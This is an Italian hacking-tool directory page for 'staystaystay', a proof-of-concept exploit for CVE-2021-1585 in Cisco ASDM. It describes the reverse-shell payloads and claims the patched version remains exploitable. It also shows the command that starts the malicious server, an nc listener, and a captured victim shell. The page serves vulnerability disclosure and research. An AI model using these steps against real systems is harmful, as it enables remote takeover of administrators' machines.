Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
staystaystay — Prova di concetto per CVE-2021-1585: Cisco ASA Device Manager RCE | Kitploit
Strumenti/GitHubGitHub/jbaines-r7/staystaystay
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubjbaines-r7/staystaystay

staystaystay

Prova di concetto per CVE-2021-1585: Cisco ASA Device Manager RCE

Vedi Repository
1344 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

staystaystay

staystaystay è un exploit proof of concept per CVE-2021-1585, un problema di RCE (Remote Code Execution) da man-in-the-middle o endpoint malintenzionato che affligge Cisco ASA Device Manager (ASDM). Il problema è stato scoperto originariamente da Malcolm Lashley e divulgato nell'estate del 2021. Tuttavia, mentre stavo esaminando la questione, era ancora non corretto nell'ultima versione (ASDM 7.17(1)); ci sono incappato in modo indipendente.

Cisco ha "corretto" il problema in ASDM 7.18(1.152). Dico "corretto" perché questo exploit funziona ancora perfettamente. L'utente dovrà solo fare clic su "Sì". Guarda un video qui sotto.

Gli aggressori possono configurare due tipi di payload per ottenere una reverse shell sulla vittima:

  • basato su jjs.exe (un file viene scritto su disco - e recentemente è stato intercettato da Windows Defender)
  • basato su Longtime Sunshine

Se una vittima connette il proprio ASDM a staystaystay, verrà iniettato il payload configurato, producendo una reverse shell. La reverse shell jjs può essere catturata con un tipico listener nc (o anche con Metasploit, se preferisci). L'opzione Longtime Sunshine richiede che l'aggressore usi tale framework.

Ad esempio, il seguente comando avvierà staystaystay sulla porta 8443 con il payload jjs:

root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

Una volta che la vittima si connette alla porta 8443, verrà generata una reverse shell verso 10.0.0.2:1270:

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

Il seguente video contiene un esempio di sfruttamento con Longtime Sunshine:

  • https://www.youtube.com/watch?v=07VO2JGTWR8

Il seguente video dimostra l'attacco contro una versione patchata:

  • https://www.youtube.com/watch?v=ySgbHClk9HE

Un write-up di AttackerKB è disponibile qui:

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

Crediti

  • Taylor Swift - Versione acustica
Scarica lo strumento